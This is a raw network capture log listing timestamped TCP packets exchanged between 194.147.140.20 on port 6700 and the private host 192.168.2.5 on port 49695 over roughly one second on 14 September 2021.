Sep 14, 2021 21:25:11.195372105 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195437908 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.195470095 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195487022 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195502996 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.195542097 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.195631027 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.381722927 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.381784916 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.382091045 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.383196115 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383227110 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383245945 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383264065 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383289099 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383291006 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.383318901 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.383363008 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383430004 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.383492947 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383512974 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383589029 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383624077 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.383631945 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383651972 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383690119 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.383872032 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383892059 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.383908033 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.384031057 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.568722963 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.568802118 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.568882942 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.568913937 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.568959951 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.569010019 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.569453001 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.569690943 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.569752932 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.569880009 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572128057 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572153091 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572171926 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572191000 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572201967 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572207928 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572240114 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572252035 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572283030 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572300911 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572343111 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572377920 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572396994 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572451115 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572453976 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572520971 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572556019 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572571039 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572597980 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572654963 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572710037 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572779894 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572798014 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572812080 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572830915 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572880030 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.572917938 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572959900 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572977066 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.572998047 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.573029041 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.573069096 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.573097944 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.573115110 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.573132992 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.573167086 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.573194981 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.573235035 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.755852938 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.755954981 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.755979061 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756017923 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.756022930 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756067991 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.756134033 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756217003 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756272078 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756294966 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.756530046 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756581068 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756587982 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.756659985 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756719112 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756736040 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.756896019 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.756968975 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.760253906 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760289907 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760318995 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760382891 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.760472059 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760617971 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760643959 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760647058 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.760710001 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.760749102 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760859013 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760886908 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.760927916 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.760958910 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761012077 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.761077881 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761198997 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761224985 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761260033 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.761347055 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761380911 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761420012 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.761523008 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761552095 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761647940 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.761718988 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761749029 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761795998 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761812925 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.761854887 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.761885881 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.761955023 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762032032 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.762042999 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762151957 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762195110 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762238026 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.762293100 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762337923 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762370110 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.762469053 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762505054 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762531996 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.762617111 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762706995 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.762711048 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762778044 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762829065 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.762947083 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.762984991 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.763016939 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.763050079 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.763170958 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.763242006 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.763246059 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.763317108 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.763354063 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.763381958 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.809619904 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.904364109 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.942701101 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.942795038 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.942872047 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.942934036 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.942940950 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.942995071 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943047047 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943100929 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943175077 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943233967 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943305016 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943327904 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943356037 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943381071 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943414927 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943468094 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943526030 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943582058 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943583012 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943648100 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.943725109 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943752050 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.943794012 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.946584940 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.946712971 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.946891069 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.946955919 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.946985006 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947042942 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947048903 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947093010 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947134972 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947180986 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947206020 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947252035 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947432041 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947467089 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947494030 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947516918 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947805882 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947869062 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.947880030 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.947947979 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948014021 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948064089 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948065042 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948117018 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948405981 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948470116 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948483944 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948535919 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948616028 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948667049 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948753119 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948786020 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948805094 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948847055 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948899031 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948921919 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.948947906 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.948987007 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949002028 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949050903 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949170113 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949220896 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949223995 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949264050 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949285984 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949337959 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949393988 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949440002 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949501038 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949553013 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949554920 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949610949 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949626923 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949680090 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949706078 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949768066 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.949887037 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949914932 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949963093 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.949961901 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950016975 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950028896 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.950077057 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950149059 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.950206041 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.950227022 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950253963 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950308084 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.950359106 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950434923 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.950484991 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.950486898 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.950530052 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:11.995973110 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:11.996146917 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.129854918 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130026102 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130111933 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130141020 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.130172968 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130217075 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130234957 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.130255938 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130295038 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130311012 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.130332947 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130388021 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.130516052 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130556107 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130611897 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130621910 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.130671024 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.130729914 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.132742882 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.133255959 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.133279085 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.133291960 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.133331060 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.133357048 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.133397102 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.133455992 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.133505106 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.133542061 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.141769886 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.141825914 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.141861916 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142179966 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142224073 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142251968 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142261982 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142296076 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142321110 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142333031 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142369032 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142399073 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142426968 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142457008 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142477036 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142482996 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142512083 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142539978 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142573118 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142590046 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142602921 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142633915 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142648935 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142663956 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142693996 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142709017 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.142935991 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142977953 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.142987967 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.143011093 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143038988 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143053055 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.143074989 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143105984 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143126011 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.143166065 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143198013 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143210888 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.143230915 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143264055 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143277884 CEST	49695	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 21:25:12.143295050 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143325090 CEST	6700	49695	194.147.140.20	192.168.2.5
Sep 14, 2021 21:25:12.143335104 CEST	49695	6700	192.168.2.5	194.147.140.20
